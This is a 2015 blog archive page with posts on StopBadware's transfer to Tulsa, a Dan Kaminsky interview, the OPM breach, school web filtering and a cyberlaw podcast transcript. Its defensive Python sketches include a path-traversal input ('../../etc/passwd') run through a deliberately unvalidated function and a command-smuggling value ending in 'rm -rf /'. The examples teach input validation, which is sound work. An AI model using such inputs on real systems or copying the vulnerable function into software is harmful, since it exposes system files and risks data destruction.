Monthly Archives: June 2015

StopBadware transferring operations to University of Tulsa

In 2006, Harvard’s Berkman Center introduced a new project: StopBadware.org, a collective effort to protect consumers from bad software and expose the people who profited from it. StopBadware was to be a collaboration between the academic community and leading technology companies, a force for transparency and openness in an increasingly siloed online environment, and a haven for users seeking information about bad software and malicious websites. The project was backed by Internet pioneers in both business and academia: founders Jonathan Zittrain and John Palfrey, advisers Vint Cerf and Esther Dyson, supporting companies including Google and Lenovo. From its first day, StopBadware was a collaboration intended to demonstrate the full promise of the Internet by protecting and expanding user choice.

After almost a decade of collaborative work and more than five years as a standalone nonprofit, StopBadware is shutting down operations as an independent organization and transferring core programs to the University of Tulsa, where they’ll be run by our longtime research adviser, Dr. Tyler Moore. This decision rested upon two pillars: the unpredictability of long-term funding prospects and the strength of our ties to the research community. Ultimately, StopBadware’s board and staff agreed that our mission is better served by re-establishing roots in academia under the capable guidance of Dr. Moore and his team.

The programs we expect to transfer to Tulsa include our independent review process, the StopBadware Data Sharing Program, and maintenance of our informational resources and searchable Clearinghouse.

What does this mean in practical terms?

  • Users and webmasters will still be able to look up URLs, IPs, and ASNs in our Clearinghouse and report malicious URLs to our community feed.
  • Website owners whose resources are blacklisted by one or more of our data providers will still be able to request an independent review from StopBadware.
  • Technology companies, independent security researchers, and academic institutions will still be able to contribute malware data feeds to StopBadware’s data sharing program.
  • StopBadware’s shared and proprietary data will still be used to facilitate research on cybercrime and the security ecosystem.
  • Users who encounter browser or search warnings about malware websites will still be able to reach StopBadware information about badware and how to protect their computers.

StopBadware’s Boston-based office and staff will cease operation by September, as will our current board of directors. Over the next few months, we’ll also be shutting down the StopBadware Partner program and the We Stop Badware™ Web Host program in order to let the incoming team in Tulsa focus on the review process, data sharing program, and research projects. The StopBadware Board and outgoing staff have known Tyler Moore since our early days as a Berkman Center project; we have the utmost confidence in his vision and unflagging dedication to StopBadware’s mission.

Over the next two months, we’ll be painting a bigger picture for our community to illustrate StopBadware’s accomplishments, both as an independent nonprofit and as a decade-old project in collaborative security. We’ll also turn our blog over to Dr. Moore part-time so he can expound upon his plans for the new iteration of StopBadware. Like many other good Internet citizens, we welcome the future!

- The StopBadware team

Waterloo

Captain Clement Swetenham, 16th Light Dragoons, fought at Waterloo. His great-great-great-grandson Foster Swetenham has posted more information and photos of his portrait, his Waterloo and Peninsula medals, and his charger Mask.

Safe Computing In An Unsafe World: Die Zeit Interview

So some of the more fun bugs involve one team saying, “Heh, we don’t need to validate input, we just pass data through to the next layer.”  And the next team is like, “Heh, we don’t need to validate input, it’s already clean by the time it reaches us.”  The fun comes when you put these teams in the same room.  (Bring the popcorn, but be discreet!)
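Here’s a minimal sketch of that failure mode in Python. The layer names and paths are made up for illustration; the bug pattern is not:

def edge_layer(raw: bytes) -> str:
    # "We just pass data through to the next layer."
    return raw.decode("utf-8", errors="replace")

def storage_layer(name: str) -> str:
    # "It's already clean by the time it reaches us."
    return "/var/data/" + name           # "../../etc/passwd" sails through

def careful_storage_layer(name: str) -> str:
    # What each team should do: validate at its own trust boundary.
    if not name.isalnum():
        raise ValueError("rejected unsafe name: %r" % name)
    return "/var/data/" + name

print(storage_layer(edge_layer(b"../../etc/passwd")))  # path traversal
print(careful_storage_layer("q2report"))               # fine
# careful_storage_layer("../../etc/passwd") would raise ValueError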

Policy and technology have some shared issues that each sometimes wants the other to solve.  Meanwhile, things stay on fire.

I talked with Die Zeit recently about some of our challenges in infosec.  Germany got hit pretty badly recently and there’s some soul-searching.  I’ll let the interview mostly speak for itself, but I would like to clarify two things:

1) Microsoft’s SDL (Security Development Lifecycle) deserves more credit.  It clearly yields more secure code.  But getting past code, into systems, networks, relationships, environments — there’s a scale of security that society needs, which technology hasn’t achieved yet.

2) I’m not at all advocating a military response to cyber attacks.  That would be awful.  But there’s not some magic Get Out of War Free card just because something came over the Internet.  For all the talk of regulating non-state actors, it’s actually the states that can potentially completely overwhelm any technological defense.   Their only constraints are a) fear of getting caught, b) fear of damaging economic interests, and c) fear of causing a war.  I have doubts as to how strong those fears are, or will remain.  See, they’re called externalities for a reason…

(Note:  This interview was translated into German, and then back into English.  So, if I sound a little weird, that’s why.)


The IT security researcher and hacker Dan Kaminsky

(Headline) “No one knows how to make a computer safe.”

(Subheading) The American computer security specialist Dan Kaminsky talks about the cyber-attack on the German Bundestag: In an age of hacker wars, diplomacy is a stronger weapon than technology.

AMENDED VERSION

Dan Kaminsky (https://dankaminsky.com/bio/) is one of the best-known hackers and IT security specialists in the United States. He made a name for himself with the discovery of severe security holes on the Internet and in the computer systems of large corporations. In 2008 he located a fundamental error in the DNS (http://www.wired.com/2008/07/kaminsky-on-how/), the telephone book of the Internet, and coordinated a worldwide repair. Nowadays he works as chief scientist at the New York computer security firm White Ops (http://www.whiteops.com).

Questions asked by Thomas Fischermann

ZEIT Online: After the cyber attack on the German Bundestag, there has been a lot of criticism of the IT management (http://www.zeit.de/digital/datenschutz/2015-06/hackerangriff-bundestag-kritik). Are the Germans sloppy when it comes to computer security?

Dan Kaminsky: No one should be surprised if a cyber attack succeeds somewhere. Everything can be hacked. I assume that all large companies are confronted somehow with hackers in their systems, and successful intrusions into national systems have increased. The United States, for example, recently lost sensitive data about people with “top secret” access to state secrets to Chinese hackers. (http://www.reuters.com/article/2015/06/15/us-cybersecurity-usa-exposure-idUSKBN0OV0CC20150615)

ZEIT Online: Because of secret services and government-employed super hackers who have recently taken to the Internet?

Kaminsky: I’ll share a business secret with you: hacking is very simple. Even teenagers can do it. And some of the most sensational computer break-ins in history were technically standard stuff – e.g., the attack on Sony Pictures last year that Barack Obama publicly blamed North Korea for (http://www.zeit.de/2014/53/hackerangriff-sony-nordkorea-obama). Three or four engineers can manage that in three to four months.

ZEIT Online: It has been stated over and over again that some hacker attacks carry the “signature” of large competent state institutions.

Kaminsky: Sometimes it is true, sometimes it is not. Of course, state institutions can work better, with lower error rates, more persistently and less noticeably. And they can attack very difficult targets: e.g., nuclear power plants and technical infrastructure. They can prepare future cyber-attacks and could turn off the power of an entire city in the event of war.

ZEIT Online: But once more: could we not have protected the computers of the German Bundestag better?

Kaminsky: There is a very old race between attackers and defenders. Nowadays attackers have a lot of possibilities while defenders have only a few. At the moment, no one knows how to make a computer really safe.

ZEIT Online: That does not sound optimistic.

Kaminsky: The situation can change. All great technological developments were unsafe in the beginning; just think of railways, automobiles and aircraft. The most important thing in the beginning is that they work; after that, they get safer. We have only been working on the security of the Internet and of computer systems for the last 15 years…

ZEIT Online: How is it going?

Kaminsky: There is, for example, a whole movement looking for new programming methods that eliminate hackers’ entry points. In my opinion the “Langsec” approach is very interesting (http://www.upstandinghackers.com/langsec): it looks for a kind of binding grammar for computer programs and data formats that makes everything safe. If you follow the rules, it should be hard for a programmer to produce the kinds of errors that hostile hackers can exploit later on. When a system executes a program in the future, or when software needs to process a data record, it will first be checked precisely to see whether all the rules were followed – as if a grammar teacher were checking it.
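(A toy sketch of the langsec idea in Python: the entire input must match a strict grammar before anything else is allowed to act on it. The grammar and field names below are illustrative, not taken from any langsec tool:)

import re

# Reject-by-default: anything outside the grammar never reaches
# the rest of the program.
RECORD = re.compile(r"(?P<user>[a-z]{1,16}):(?P<age>0|[1-9][0-9]{0,2})")

def parse_record(raw: str) -> dict:
    m = RECORD.fullmatch(raw)
    if m is None:
        raise ValueError("input does not match grammar: %r" % raw)
    return {"user": m.group("user"), "age": int(m.group("age"))}

print(parse_record("alice:42"))           # {'user': 'alice', 'age': 42}
print(parse_record("alice:42; rm -rf /")) # raises ValueError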

ZEIT Online: That still sounds very theoretical…

Kaminsky: It is a new technology, and it is still under development. In the end it will not only be possible to write secure software; it will happen naturally, without any special effort, and it will be cheap.

ZEIT Online: Which other approaches do you consider promising?

Kaminsky: Ongoing security tests for computer networks are becoming more widespread: firms and institutions pay hackers to break in continually in order to find holes and close them. Nowadays this happens sporadically or at long intervals, but in the future we will need more of those “friendly” hackers.  Third, there is a totally new generation of anti-hacker software in development. Its task is not to prevent break-ins – because they will happen anyway – but to observe the intruders very closely. This way we can better assess who the hackers are, and we can keep them from retaining access for days or weeks.

ZEIT Online: Nevertheless, those are still future scenarios. What can we do today if we are already in possession of important data? Go offline?

Kaminsky: No one will go offline. That is simply too inefficient. But even today you can store data in such a way that it is not all gone after a single successful hacker attack: you split it up. Does a computer user really ever need access to all the documents in the whole system? Does the user need so much system bandwidth that he can download masses of documents?
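(A rough sketch, in Python, of the splitting-and-throttling idea Kaminsky describes: no single account gets to pull the whole archive at wire speed. The class name, limits, and user are hypothetical:)

import time
from collections import deque

class DocumentQuota:
    """Allow each user at most max_docs fetches per window_seconds."""

    def __init__(self, max_docs, window_seconds):
        self.max_docs = max_docs
        self.window_seconds = window_seconds
        self.fetches = {}                      # user -> deque of timestamps

    def allow(self, user):
        now = time.monotonic()
        window = self.fetches.setdefault(user, deque())
        while window and now - window[0] > self.window_seconds:
            window.popleft()                   # forget fetches outside window
        if len(window) >= self.max_docs:
            return False                       # over quota: deny, flag for review
        window.append(now)
        return True

quota = DocumentQuota(max_docs=20, window_seconds=3600)   # 20 docs/hour
denied = sum(1 for _ in range(500) if not quota.allow("j.smith"))
print(denied, "of 500 bulk fetches denied")               # prints 480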

ZEIT Online: A famous case of this is the US intelligence community, which lost thousands of documents to Edward Snowden. But there are also a lot of hackers who work for the NSA breaking into other computer systems …

Kaminsky: … yeah, and that is poison for the security of the net. The NSA and a lot of other secret services say nowadays: We want to defend our computers – and attack the others. Most of the time, they decide to attack and make the Internet even more unsafe for everyone.

ZEIT Online: Do you have an example of this?

Kaminsky: American intelligence services have known for more than a decade that spy software can be hidden in the firmware of computer hard disks (http://www.geek.com/apps/nsa-malware-found-hiding-in-hard-drives-for-almost-20-years-1615949/, http://www.kaspersky.com/about/news/virus/2015/Equation-Group-The-Crown-Creator-of-Cyber-Espionage). Instead of getting rid of those security holes, they have been actively using them for themselves over the years… That avenue was open to the secret services – who have used it in a number of recently discovered malware families – and to everyone else who discovered those holes as well.

ZEIT Online: Can such behavior be changed?

Kaminsky: Yes, economically. Nowadays spy agencies derive their right to exist from being able to get information out of other people’s computers. If they made the Internet safer, they would hardly be rewarded for it…

ZEIT Online: A whole industry also takes care of the security of the net: vendors of antivirus and other protection programs.

Kaminsky: Nowadays we spend a lot of money on security programs. But we do not even know whether the computers protected that way really get hacked less often. We have no good empirical data and no controlled studies on that.

ZEIT Online: Why does no one conduct such studies?

Kaminsky: This is obviously a market failure. The market does not offer services that would be urgently needed for increased safety in computer networks – a classic case in which governments could make themselves useful. By the way, the state could contribute something else: deterrence.

ZEIT Online: Pardon?

Kaminsky: In terms of computer security, we still blame the victims themselves most of the time: you got hacked, how dumb! But when it comes to nation-state hacker attacks that could lead to cyber wars, this way of thinking is not appropriate. If someone dropped bombs on a city, no one’s first reaction would be: how dumb of you not to have thought of defensive missiles!

ZEIT Online: What should the answer look like, then?

Kaminsky: Nation states are usually good at coming up with collective punishments: diplomatic reactions, economic sanctions or even acts of war. It is important that nation states discuss with each other what an acceptable level of state hacking is and what would be too much. We have established such rules for conventional wars but not for hacker attacks and cyber war. For a long time these were not considered as dangerous, but that has changed. You want to live in a cyber war zone as little as you want to live in a conventional war zone!

ZEIT Online: To be prepared for counterstrikes, you first have to know your attacker. We still do not know who was responsible for the German Bundestag hack…

Kaminsky: Yeah, sometimes you do not know who is attacking you. On the Internet there are not that many borders or geographical markers, and attackers can disguise their origin. To really solve this problem, you would have to change the architecture of the Internet.

ZEIT Online: You would have to?

Kaminsky: … and then there is still the question: would it really be better for us economically than the earlier leading communication technologies, Minitel from France or America Online? Were our lives better when network connections were still horribly expensive? And is a new kind of net even possible when well-resourced criminals or nation states could find new ways to manipulate it anyway? The “attribution problem” with cyber attacks remains serious, and there are no obvious solutions. There are, though, a lot of proposed solutions that are even worse than the problem itself.

Questions were asked by Thomas Fischermann (@strandreporter, @zeitbomber)

The OPM hack is bad but it’s not a ‘cyber Pearl Harbor’

The U.S. Office of Personnel Management wants you to know that it thwarts 10 million hack attempts a month. But it takes just one successful breach to undo all that successful thwarting. And last year, OPM’s network was breached by an attack it identified as coming from China. The government of China has denied any involvement, but 4 million federal employees have been offered 18 months of credit report monitoring.

“Follow-up reports indicate that the breach may extend well beyond federal employees to individuals who applied for security clearances with the federal government,” Brian Krebs wrote, in an excellent summation of the hack. As many as 14 million people who’ve worked for or attempted to work for the government may be affected.

What kind of information did the hackers get access to?

F-Secure’s Chief Research Officer Mikko Hypponen tweeted this sample:

[Image: sample of the compromised OPM questionnaire data, via Mikko Hypponen’s tweet]

Knowing which federal employees have admitted to illegal drug use could be pretty valuable information, especially if there’s anyone who is actually honest about such behavior on these kinds of forms.

That the U.S. government has had networks containing secret data infiltrated is obviously a huge problem. Especially disturbing is the news that the files weren’t encrypted because the OPM’s systems were too antiquated. (UPDATE: Apparently, encryption wouldn’t have helped.)

Some are calling this hack a “cyber Pearl Harbor” and wondering why the Obama Administration isn’t retaliating more directly. But there’s a perfectly clear reason why “cyber Pearl Harbor” is not an accurate description, as much as critics of President Obama and those in favor of cybersecurity laws like CISPA might like it to be.

“Pearl Harbor metaphors should be restricted to war,” F-Secure Security Advisor Sean Sullivan told me. “This is espionage, and so the use of it is hyperbole.”

Also, Pearl Harbor — the famed “sneak attack” on U.S. military installations by the Japanese that killed more than 2,400 people and drew America into World War II — suggests an unprovoked attack by a state. It’s unclear if this attack was entirely unprovoked or backed by a government.

The U.S. has been accused of its own hacking and launching its own cyber attacks. The Snowden revelations include claims of “large-scale, organized cyber theft, wiretapping and supervision of political figures, enterprises and individuals of other countries, including China.” And those claims are backed up by substantial evidence, leaving the U.S. in an awkward position as it reckons with its own security failings and potential response, especially when attributing the sources of attacks is increasingly difficult.

If nothing else, this attack shows that the U.S. government suffers from the same failings as many large corporations that have fallen prey to hacks in recent years. The costs of such breaches are escalating for businesses and states.

Still, it’s important to keep perspective.

Pearl Harbor was an aberrational act of war that triggered a global reaction. The OPM hack is perhaps an unprecedented act of espionage when it comes to a breach of U.S. government networks. Unfortunately, though, it doesn’t seem indicative of something unusual; it reads as an ominous hint of a new normal.

[Image by Jonathan Briggs | Flickr]

Time For a Digital Detox or Better Filtering?



Being easily distracted has been a thorn in my side since Oldbury Park Primary School. I remember the day when mum and dad sat me down and read out my year 6 school report. Things were going so well, and then - boom - a comment from Mrs Horn that rained on my previously unsullied education record. “Sarah can organize herself and her work quite competently if she wishes, but of late has been too easily distracted by those around her.” She had a point, but try telling that to a distraught eleven-year-old who valued the opinion of her teachers. I made a vow after that: I would never let my report card be sullied again. Working on my concentration in secondary school and college helped me to pass my GCSEs and A-levels.


Then, when I entered the world of work, I found an environment not too dissimilar to school. There were managers to impress, friends to win, and office politics instead of playground politics. Comme ci, comme ça. But I was better informed this time, and found ways to stay focused: wearing headphones (a great way to show you’re otherwise engaged), meditation (limited to the park, never in the office), and writing to-do lists. But these are workplace tactics; if I were a student now, my report would probably be worse. I’d be lost with access to so many devices and so much time-wasting material.
So there, I’ve laid bare more than I should have, but I think my personal character assassination has been worth it, because it’s proved a point. Kids have always been distracted; tech has just made the problem worse. In addition to the usual classroom distractions, teachers now have to manage digital distractions, and it’s all affecting students’ progress.


For the head of the Old Hall School in Telford, Martin Stott, observing this trend was worrying. He said, “It seems to me that children’s ability to take on board the instructions for multi-step tasks has deteriorated. For a lot of children, all their conversation revolves around these games. It upsets me to see families in restaurants and as soon as they sit down the children get out their iPads.” Stott isn’t the first to raise the issue of digital dependency (there are digital detox centers for adults who want a break from tech). He might, however, be the first to bring the issue to the education arena and get significant media coverage, by introducing a week-long digital embargo at his school. Students have to put away the Xboxes and iPads and turn off the TV, in an attempt to discover other activities like reading, board games and cards.

I’m split on the whole digital detox idea. The cynic in me asks how a one-week break can make any real change to the amount of time kids spend on devices. And restricting them completely is a surefire way to spark rebellion. But my optimistic side says it’s a step in the right direction: it raises awareness by asking kids to realize that there’s life outside Minecraft and social media. Now that’s not so bad.

Nonetheless, I do think that the problems with device dependency at Old Hall School could be solved with better filtering instead of a digital detox. As existing users will tell you, there’s a trusty little tool in our web filter known as ‘limit to quota’. Admins can configure the amount of time users can spend on different types of material, including material classified as time-wasting. According to predefined rules, users can use their allocation in bite-sized chunks and be prompted every five or ten minutes with an alert stating how much they’ve used. That way there’ll be no nasty shocks; when the timer eventually runs out after 60 minutes, they’ll still be able to use the safe parts of the web that support their educational needs, without the distractions. Now that’s got to be more appealing than dropping the devices cold turkey, isn’t it? (A rough sketch of the logic follows.)
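Here’s a sketch in Python of the ‘limit to quota’ behavior described above. The real product’s configuration format isn’t shown in this post, so the category names and rule structure are my own illustration; the 60-minute allowance and five-minute prompts come from the description:

QUOTA_MINUTES = 60          # timer runs out after 60 minutes
ALERT_EVERY = 5             # prompt every five minutes
TIME_WASTING = {"games", "social-media", "video"}   # made-up category names

def check_request(category, minutes_used):
    if category not in TIME_WASTING:
        return "allow"                        # educational content: unlimited
    if minutes_used >= QUOTA_MINUTES:
        return "block: quota exhausted, safe web still available"
    if minutes_used and minutes_used % ALERT_EVERY == 0:
        remaining = QUOTA_MINUTES - minutes_used
        return "allow, alert: %d minutes left" % remaining
    return "allow"

print(check_request("social-media", 55))   # allow, alert: 5 minutes left
print(check_request("social-media", 60))   # block: quota exhausted...
print(check_request("homework", 60))       # allow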


Talking with Stewart Baker

So I went ahead and did a podcast with Stewart Baker, former general counsel of the NSA and actually somebody I have a decent amount of respect for (Google set me up with him during the SOPA debate; he understood everything I had to say, and he really applied some critical pressure, publicly and behind the scenes, to shut that mess down).  Doesn’t mean I agree with the guy on everything.  I told him in no uncertain terms that we had some disagreements regarding backdoors, and that if he asked me about them I’d say so.  He was completely OK with this, and in today’s echo-chamber-loving society that’s a real outlier.  The debate is a ways in, and starts around here.

You can get the audio (and a summary) here, but as usual I’ve had the event transcribed.  Enjoy!

Steptoe Cyberlaw Podcast-070

Stewart: Welcome to episode 70 of the Steptoe Cyberlaw Podcast, brought to you by Steptoe & Johnson; thank you for joining us. We’re lawyers talking about technology, security, privacy and government, and I’m joined today by our guest commentator, Dan Kaminsky, who is the Chief Scientist at White Ops, the man who found and fixed a major and very troubling flaw in the DNS system, and my unlikely ally in the fight against SOPA because of its impact on DNS security. Welcome, Dan.

Dan: It’s good to be here.

Stewart: All right; and Michael Vatis, formerly with the FBI and the Justice Department, now a partner in Steptoe’s New York office. Michael, I’m glad to have you back, and I guess to be back with you on the podcast.

Michael: It’s good to have a voice that isn’t as hoarse as mine was last week.

Stewart: Yeah, that’s right, but you know, you can usually count on Michael to know the law – this is a valuable thing in a legal podcast – and Jason Weinstein, who took over last week in a coup in the Cyberlaw podcast and ran it and interviewed our guest, Jason Brown from the Secret Service. Jason is formerly with the Justice Department, where he oversaw computer crime prosecutions, among other things, and is now doing criminal and civil litigation at Steptoe.

I’m Stewart Baker, formerly with NSA and DHS, the record holder for returning to Steptoe to practice law more times than any other lawyer, so let’s get started. For old time’s sake we ought to do one more, one last hopefully, this week in NSA. The USA Freedom Bill was passed, was debated, not amended after efforts; passed, signed and is in effect, and the government is busy cleaning up the mess from the 48/72 hours of expiration of the original 215 and other sunsetted provisions.

So USA Freedom; now that it’s taken effect I guess it’s worth asking what it does. It gets rid of bulk collection across the board, really. It says, “No, you will not go get stuff just because you need it and won’t be able to get it later; if you can’t get it from the guy who holds it, you’re not going to get it.” It does that for pen/traps, it does that for Section 215, the subpoena program, and it most famously gets rid of the bulk collection program that NSA was running and that Snowden leaked in his first and apparently only successful effort to influence US policy.

[And it adds the new FISA court amici] who are supposed to be basically Al Qaeda’s lawyers – that’s editorializing; just a bit – they’re supposed to stand for freedom and against actually gathering intelligence on Al Qaeda, so it’s pretty close. And we’ve never given the Mafia its own lawyers in wiretap cases before the wiretap is carried out, but we’re going to do that for –

Dan: To be fair you were [just] wiretapping the Mafia at the time.

Stewart: Oh, absolutely. Well, the NSA never really had much interest in the Mafia, but with Title 3, yeah; you went in and you said, “I want a Title 3 order,” and you got it if you met the standard in the view of the judge, and there were no additional lawyers appointed to argue against giving you access to the Mafia’s communications. And Michael, you looked at it as well – I’d say those were the two big changes – there are some transparency issues and other things – anything that strikes you as significant out of this?

Michael: I think the only other thing I would mention is the restrictions on NSLs where you now need to have specific selection terms for NSLs as well, not just for 215 orders.

Stewart: Yeah, really the House just went through and said, “Tell us what capabilities could be used to gather national security information, and we will impose this specific selection term requirement on it.” That is really the main change, probably, for ordinary uses of 215 as though it were a criminal subpoena. Not that much change. I think the notion of relevance has probably always carried some notion that there is a point at which it gathered too much and the courts would have said, “That’s too much.”

Michael: The argument going in was that, okay, telecoms already retain all this stuff for 18 months for billing purposes, and they’re required to by FCC regulation. But I think, as we’ve discussed before, they’re not really required to retain all the stuff that NSA has been getting under the bulk collection program, especially now that people have unlimited calling plans; telecoms don’t need to retain information about every number called because it doesn’t matter for billing purposes.

So I think, going forward, we’ll probably hear from NSA that they’re not getting all the information they need, so I don’t think this issue is going to go away forever. I think we’ll be hearing complaints and seeing some desire by the Administration to impose some sort of data retention requirements on telecoms, and then there’ll be a real fight.

Stewart: That will be a fight. Yeah, I have said recently that, sure, this new approach can be as effective as the old approach if you think that going to the library is an adequate substitute for using Google. They won’t be able to do a lot of the searching that they could do and they won’t have as much data. But on the upside, there are widespread rumors that the database never included many smaller carriers and never included mobile data, probably because of difficulties separating out location data from the things that they wanted to look at.

So privacy concerns have already sort of half-crippled the program, and it also seems to me you have to be a remarkably stupid terrorist to think that it’s a good idea to call home using a phone that operates in the United States. People will use Call of Duty or something to communicate.

All right, the New York Times has one of its dumber efforts to create a scandal where there is none – it was written by Charlie Savage and criticized on Lawfare by Ben Wittes, and Charlie, who probably values his reputation in national security circles somewhat, writes a really slashing response to Ben Wittes, but I think, frankly, Ben has the better of the argument.

The story says, “Without public notice or debate, the Obama Administration has expanded the NSA’s warrantless surveillance of Americans’ international Internet traffic to search for evidence of malicious computer hacking,” according to some documents obtained from Snowden. It turns out, if I understand this right, that what NSA was looking for in that surveillance, which is a 702 surveillance, was malware signatures and other indicia that somebody was hacking Americans, so they collected or proposed to collect the incoming communications from the hackers, and then to see what was exfiltrated by the hackers.

In what universe would you describe that as Americans’ international Internet traffic? I don’t think when somebody’s hacking me or stealing my stuff that that’s my traffic. That’s his traffic, and to lead off with that framing of the issue is clearly baiting somebody for an attempted scandal, but a complete misrepresentation of what was being done.

Dan: I think one of the issues is there’s a real feeling, “What are you going to do with that data?” Are you going to report it? Are you going to stop malware? Are you going to hunt someone down?

Stewart: All of it.

Dan: Where is the – really?

Stewart: Yeah.

Dan: Because there’s a lot of doubt.

Stewart: Yeah; I actually think that the FBI regularly – this was a program really to support the FBI in its mission – and the FBI has a program that’s remarkably successful, in the sense that people are quite surprised when they show up, to go to folks who have been compromised and say, “By the way, you’re pwned,” and most of the time when they do that people say, “What? Huh?” This is where some of that information almost certainly comes from.

Dan: The reality is, everyone always says, “I can’t believe Sony got hacked,” and many of us actually in the field go, “Of course we can believe it.” Sony got hacked because everybody’s hacked somewhere.

Stewart: Yes, absolutely.

Dan: There’s a real need to do something about this on a larger scale. There is just such a lack of trust going on out there.

Stewart: Oh yeah.

Dan: And it’s not without reason.

Stewart: Yeah; Jason, any thoughts about the FBIs role in this?

Jason: Yeah. I think that, as you said, the FBI does a very effective job either pushing out information generally through alerts about new malware signatures or knocking on doors to tell particular victims they’ve been hacked. They don’t have to tell them how they know or what the source of the information is, but the information is still valuable.

I thought, to the extent that this is one of those things under 702, that a reasonable person will look at this and be appreciative of the fact that the government was doing this, not critical. And as you said, the notion that internet traffic stolen from Americans should be characterized as surveillance of Americans’ traffic is a little bit nonsensical.

Stewart: So without beating up Charlie Savage – I like him, but he deserves it on this one; he’s actually usually reasonably careful. The MasterCard settlement, or the failed MasterCard settlement, in the Target case: Jason, can you bring us up to date on that and tell us what lessons we should learn from it?

Jason: There have been so many high-profile breaches in the last 18 months that people may not remember Target, which of course was breached in the holiday season of 2013. MasterCard, as credit card companies often do, tried to negotiate a settlement on behalf of all of its issuing banks with Target to pay damages for losses suffered as a result of the breach. In April MasterCard negotiated a proposed settlement with Target that would require Target to pay about $19 million to the various financial institutions that had to replace cards and cover losses and things of that nature.

But three of the largest banks, in fact I think the three largest MasterCard-issuing banks, Citigroup, Capital One and JPMorgan Chase, all said no; they indicated they would not support the settlement, and scuttled it, because they thought $19 million was too small to cover the losses. Trade groups for the banks and credit unions say that between the Target and Home Depot breaches combined there were about $350 million in costs incurred by the financial institutions to reissue cards and cover losses, so even if you factor out the Home Depot portion of that, $19 million is a pretty small number.

So Target has to go back to the drawing board, as does MasterCard, to figure out if there’s a settlement or if the litigation is going to continue. And there’s also a proposed class action ongoing in Minnesota involving some smaller banks and credit unions as well. It would only cost them $10 million to settle the consumer class action, but the bigger exposure here is with the financial institutions – Michael made reference last week to some press in which some commentator suggested the class actions from data breaches were on the wane – and we both are of the view that that’s just wrong.

There may be some decrease in privacy-related class actions related to misuse of private information by providers, but when it comes to data breaches involving retailers and credit card information, I think not only are the consumer class actions not going anywhere, but the class actions involving the financial institutions are definitely not going anywhere. Standing is not an issue at all. It’s pretty easy for these plaintiffs to demonstrate that they suffered some kind of injury; they’re the ones covering the losses and reissuing the cards, and depending on the size of the breach the damages can be quite extensive. I think it’s a sign of the times that in these big breaches you’ll find banks insisting on a much bigger pound of flesh from the victims.

Stewart: Yeah, I think you’re right about that. The settlements, as I saw when I did a quick study of settlements for consumers, are running between 50 cents and two bucks per exposure, which is not a lot, and the banks’ expenses for reissuing cards are more like 50 bucks per victim. But it’s also true that many of these cards are never going to be used; many of these numbers are never going to be used, and so spending 50 bucks for every one of them to reissue the cards, at considerable cost to the consumers as well, might be an overreaction, and I wouldn’t be surprised if that were an argument.

Dan: So my way of looking at this is from the perspective of deterrence. Is $19 million enough of a cost to Target to cause them to change their behavior and really invest? It’s going to be extraordinarily expensive to migrate our payment system to the reality, which is that we have online verification. We can use better technologies. They exist. There’s a dozen ways of doing it that don’t leave a password to your money lying all over the world. This is ridiculous.

Stewart: It is.

Dan: I’m just going to say the big banks have a point; $19 million is –

Stewart: Doesn’t seem like a lot.

Dan: [Not enough] to say, “We really need to invest in this; this never needs to happen again,” and I’m not saying 350 is the right number, but I’ve got to agree, 19 is not.

Stewart: All right then. Okay, speaking of everybody being hacked, everybody includes the Office of Personnel Management.

Dan: Yeah.

Stewart: [I got to see] my first background investigation, and it was quite amusing because the government, in order to protect privacy, blacked out the names of all the investigators, whom I wouldn’t have known from Adam, but left in all my friends’ names as they’re talking about my drug use, or not.

Dan: Alleged.

Stewart: Exactly; no, they were all stand up guys for me, but there is a lot of stuff in there that could be used for improper purposes and it’s perfectly clear that if the Chinese stole this, stole the Anthem records, the health records, they are living the civil libertarian’s nightmare about what NSA is doing. They’re actually building a database about every American in the country.

Dan: Yeah, a little awkward, isn’t it?

Stewart: Well, annoying at least; yes. Jason, I don’t know if you’ve got any thoughts about how OPM responds to this? They apparently didn’t exactly cover themselves with glory in responding to an IG report from last year saying, “Your systems suck so bad you ought to turn them off.”

Jason: Well, first of all, as your lawyer I should say that your alleged drug use was outside the limitations period of any federal or state government that I’m aware of, so no one should come after you. I thought it was interesting that they were offering credit monitoring, given that the hack has been attributed to China, which I don’t think is having any money issues or going to steal my credit card information.

I’m pretty sure that the victims include the three of us so I’m looking forward to getting that free 18 months of credit monitoring. I guess they’ve held out the possibility that the theft was for profit as opposed to for espionage purposes, and the possibility that the Chinese actors are not state sponsored actors, but that seems kind of nonsensical to me. And I think that, as you said, as you both said, that the Chinese are building the very database on us that Americans fear that the United States was building.

Stewart: Yeah, and I agree with you that credit monitoring is a sort of lame and bureaucratic response to this. Instead, they really ought to have the FBI and the counterintelligence experts ask, “What would I do with this data if I were the Chinese?” and then ask people whose data has been exploited to look for that kind of behavior. Knowing how the Chinese do their recruiting I’m guessing they’re looking for people who have family still in China – grandmothers, mothers and the like, and who also work for the US government – and they will recruit them on the basis of ethnic and patriotic duty. And so folks who are in that situation could have their relatives visited for a little chat; there’s a lot of stuff that is unique to Chinese use of this data that we ought to be watching for a little more aggressively than stealing our credit.

Stewart: Yeah; well, that’s all we’ve got when it’s hackers. We should think of a new response to this.

Dan: We should, but like all hacks [attribution] is a pain in the butt because here’s the secret – hacking is not hard; teenagers can do it.

Stewart: Yes, that’s true.

Dan: [Something like this can take just] a few months.

Stewart: But why would they invest?

Dan: Why not? Data has value; they’ll sell it.

Stewart: Maybe; so that’s right. On the other hand the Anthem data never showed up in the markets. We have better intelligence than we used to. We’ll know if this stuff gets sold and it hasn’t been sold because – I don’t want to give the Chinese ideas but –

Dan: I don’t think they need you to give them ideas; sorry.

Stewart: One more story, just to show that I was well ahead of the Chinese on this – for my first security clearance they asked me for people with whom I had obligations of affection or loyalty who were foreigners. And I said, I’m an international lawyer – this was before you could just print out your Outlook contacts – so I Xeroxed all those sheets of business cards that I’d collected, and I sent it to the guy and said, “These are all the clients or people I’ve pitched,” and he said, “There are like 1,000 names here.” I said, “Yeah, these are people that I either work for or want to work for.” And he said, “But I just want people to whom you have ties of obligation or loyalty or affection.” I said, “Well, they’re all clients and I like them and I have obligations to clients, or I want them to be. I’ve pitched them.” And he finally stopped me and said, “No, no, I mean are you sleeping with any of them?” So good luck, China, figuring out which of them, if any, I was actually sleeping with.

Dan: You see, you gave up all those names to China.

Stewart: They’re all given up.

Dan: Look what you did!

